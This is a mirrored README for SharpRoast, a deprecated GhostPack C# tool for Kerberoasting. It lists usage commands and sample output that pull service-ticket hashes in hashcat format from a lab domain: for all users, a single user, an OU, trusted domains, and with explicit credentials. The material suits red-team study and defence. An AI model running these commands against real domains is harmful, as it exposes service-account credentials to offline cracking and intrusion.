SharpRoast

by GhostPack

GhostPack / SharpRoast

DEPRECATED SharpRoast is a C# port of various PowerView's Kerberoasting functionality.

215 Stars 71 Forks Last release: Not found Other 4 Commits 0 Releases

Available items

No Items, yet!

The developer of this repository has not created any items for sale yet. Need a bug fixed? Help with integration? A different license? Create a request here:

This project has now been deprecated. Its functionality has been incorporated into Rubeus via the "kerberoast" action, which provides proper ASN.1 structure parsing.

SharpRoast


SharpRoast is a C# port of various PowerView's Kerberoasting functionality. The KerberosRequestorSecurityToken.GetRequest Method() method was contributed to PowerView by @machosec. The hashes are output in hashcat format.

@harmj0y is the primary author of this port.

SharpRoast is licensed under the BSD 3-Clause license.

Usage

Roast all users in the current domain:

C:\Temp>SharpRoast.exe all
SamAccountName         : harmj0y
DistinguishedName      : CN=harmj0y,CN=Users,DC=testlab,DC=local
ServicePrincipalName   : asdf/asdfasdf
Hash                   : $krb5tgs$23$*$testlab.local$asdf/asdfasdf*$14AA4F...

SamAccountName : sqlservice DistinguishedName : CN=SQL,CN=Users,DC=testlab,DC=local ServicePrincipalName : MSSQLSvc/SQL.testlab.local Hash : $krb5tgs$23$$testlab.local$MSSQLSvc/SQL.testlab.local$9994D1...

...

Roast a specific SPN:

C:\Temp>SharpRoast.exe "asdf/asdfasdf"
Hash                   : $krb5tgs$23$*$testlab.local$asdf/asdfasdf*$14AA4F...

Roast a specific user in the current domain:

C:\Temp>SharpRoast.exe harmj0y
SamAccountName         : harmj0y
DistinguishedName      : CN=harmj0y,CN=Users,DC=testlab,DC=local
ServicePrincipalName   : asdf/asdfasdf
Hash                   : $krb5tgs$23$*$testlab.local$asdf/asdfasdf*$14AA4F...

Roast users from a specified OU in the current domani:

C:\Temp>SharpRoast.exe "OU=TestingOU,DC=testlab,DC=local"
SamAccountName         : testuser2
DistinguishedName      : CN=testuser2,OU=TestingOU,DC=testlab,DC=local
ServicePrincipalName   : service/host
Hash                   : $krb5tgs$23$*$testlab.local$service/host*$08A6462...

Roast a specific specific SPN in another (trusted) domain:

C:\Temp\>SharpRoast.exe "MSSQLSvc/[email protected]"
Hash                   : $krb5tgs$23$*user$DOMAIN$MSSQLSvc/[email protected]*$9994D148...

Roast all users in another (trusted) domain:

C:\Temp>SharpRoast.exe "LDAP://DC=dev,DC=testlab,DC=local"
SamAccountName         : jason
DistinguishedName      : CN=jason,CN=Users,DC=dev,DC=testlab,DC=local
ServicePrincipalName   : test/test
Hash                   : $krb5tgs$23$*$dev.testlab.local$test/test*$9129566...

Any of these commands also accept a [domain.com\user] [password] for to roast with explicit credentials. For example:

C:\Temp>SharpRoast.exe harmj0y "testlab.local\dfm" "Password123!"
SamAccountName         : harmj0y
DistinguishedName      : CN=harmj0y,CN=Users,DC=testlab,DC=local
ServicePrincipalName   : asdf/asdfasdf
Hash                   : $krb5tgs$23$*$testlab.local$asdf/asdfasdf*$14AA4F...

Compile Instructions

We are not planning on releasing binaries for SharpRoast, so you will have to compile yourself :)

SharpRoast has been built against .NET 3.5 and is compatible with Visual Studio 2015 Community Edition. Simply open up the project .sln, choose "release", and build.

We use cookies. If you continue to browse the site, you agree to the use of cookies. For more information on our use of cookies please see our Privacy Policy.